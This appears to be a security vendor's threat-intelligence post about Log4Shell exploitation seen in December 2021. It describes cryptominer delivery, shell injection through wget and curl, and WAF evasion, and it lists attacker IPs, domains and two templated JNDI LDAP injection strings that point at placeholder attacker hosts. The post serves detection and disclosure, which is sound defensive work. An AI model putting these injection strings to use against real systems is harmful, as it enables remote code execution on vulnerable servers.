Report: Digital Espionage and Innovation: Unpacking AgentTesla

Search
Close this search box.

Log4Shell Active Exploitation Continues…

Table of Contents

Latest Threat Activity and Fidelis Response


Key Developments | 17 December 2021

Multiple high-fidelity sources continue to report that cyber threat actors of various skill and motivation are leveraging this vulnerability to either deliver their primary payload (e.g., cryptocurrency mining malware) or establish initial access into the victim environment (e.g., Cobalt Strike), which will almost certainly lead to more intrusion chains of various sophistication. While we have yet to directly observe Cobalt Strike use, Fidelis Threat Research Team (TRT) has observed an exorbitant amount of Linux/Unix command shell injection in the week since the disclosure of the Log4shell vulnerability.

Cryptocurrency Miners

In a recent instance Fidelis TRT observed exploitation attempts against an industry-leading technology manufacturer and services provider.
In many case attempts were NOT successful but followed an intrusion TTP identical that reported in open-source channels for threat actors delivering cryptocurrency mining malware (Ref: Figures 1 and 2 below).

Log4shell exploitation attempts from actors most likely deploying crypocurrency miners – source: Fidelis Telemetry
Figure 1. Log4shell exploitation attempts from actors most likely deploying crypocurrency miners – source: Fidelis Telemetry

 

Log4shell exploitation attempts from actors most likely deploying crypocurrency miners – image credit: BleepingComputer
Figure 2. Log4shell exploitation attempts from actors most likely deploying crypocurrency miners – image credit: BleepingComputer

Command Shell Injection

In numerous instances, Fidelis TRT observed attempts at *nix command shell injection following exploitation of Log4shell (Ref: Figures 3 and 4 below).
In many cases, this was NOT successful concerning the targeted servers under our purview.
However impact in less-securely configured environments is likely; wherein such commands would allow command shell execution under the privilege context of the webserver daemon.

Command shell injections following Log4shell, using WGET – source: Fidelis Telemetry
Figure 3. Command shell injections following Log4shell, using WGET – source: Fidelis Telemetry
Command shell injections following Log4Shell, using CURL – source: Fidelis Telemetry
Figure 4. Command shell injections following Log4Shell, using CURL – source: Fidelis Telemetry

Fidelis Response

Fidelis TRT continues to enhance our detection logic primarily through direct collection and analysis of live attack telemetry data and broader observations through industry partnerships and vetted open-source intelligence.

In numerous instances this week, TRT observed threat actors attempting to subvert Web Application Firewalls (WAF). We are detecting and alerting on such attempts (Ref: Figure 5 below) and discovering threat actor TTP pivots using our logic.

Fidelis dynamic detection alert firing on WAF evasion (HTTP User-Agent) for Log4Jshell – source: Fidelis Telemetry
Figure 5. Fidelis dynamic detection alert firing on WAF evasion (HTTP User-Agent) for Log4Jshell – source: Fidelis Telemetry

Indicators

IPv4 and Port(s)

45.137.21[.]9:1389
135.148.143[.]217:1389
159.89.4[.]39:80
62.210.130[.]250:80

FQDN and Subdomain(s)

psc4fuel[.]com
*dga*.y.psc4fuel[.]com
956f6f95428e42c7af00.y.psc4fuel[.]com
d8083d89178e4d87b414.y.psc4fuel[.]com
8def43d42c0e4b3d9857.y.psc4fuel[.]com
9acd97959c2e4ca596b0.y.psc4fuel[.]com

Network Relevant Strings

${jndi:ldap://badguyFQDN[OR]IPv4/*malicious_content*}
${jndi:ldap://badguyFQDN[OR]IPv4/Basic//*maliciousbase64_content*}

About Author

Rami Mizrahi

Rami Mizrahi is the Vice President of Research and Development for Deception at Fidelis Security. He has been leading the Deception R&D team for over six years, since the inception of TopSpin Security and through the acquisition by Fidelis Security. Prior to that, he led the WAF development team at Breach Security. Rami has over 20 years of experience in software development, specializing in enterprise security.

Related Readings

One Platform for All Adversaries

See Fidelis in action. Learn how our fast and scalable platforms provide full visibility, deep insights, and rapid response to help security teams across the World protect, detect, respond, and neutralize advanced cyber adversaries.